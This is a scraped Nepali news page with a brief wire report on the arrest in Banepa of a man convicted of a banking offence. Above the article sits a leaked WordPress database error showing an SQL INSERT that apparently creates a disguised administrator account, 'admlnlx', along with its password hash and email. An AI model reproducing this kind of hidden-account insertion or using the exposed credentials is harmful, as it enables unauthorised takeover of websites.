WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B51wLlCXBcffwR0P7KwKSn3xEs.hbO.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 20:09:46', '', 'admlnlx', 'admlnlx')
बनेपा,माघ ९ –
करिब तीन वर्षदेखि बैंकिङ कसुरमा फरार रहेका ५० वर्षीय बनेपा नगरपालिका– ११ निवासी प्रकाश केसीलाई प्रहरीले बनेपाबाट शनिबार पक्राउ गरेको छ ।
तत्कालीन पुनरावेदन अदालत पाटनले उनलाई बैंकिङ कसुर मुद्दामा तीन वर्ष कैद र रु पाँच करोड २५ लाख जरिवाना हुने ठहर गरी फैसला गरेकामा फरार रहेकाले पक्राउ गरी कार्यान्वयनका लागि जिल्ला अदालत काभ्रेपलाञ्चोकलाई बुझाइएको जिल्ला प्रहरी कार्यालयका प्रहरी नायब उपरीक्षक नवीनराज राईले जानकारी दिनुभयो । उनलाई २०७१ साल वैशाख २९ गते कैदसहित जरिवानाको फैसला सुनाइएको थियो । – रासस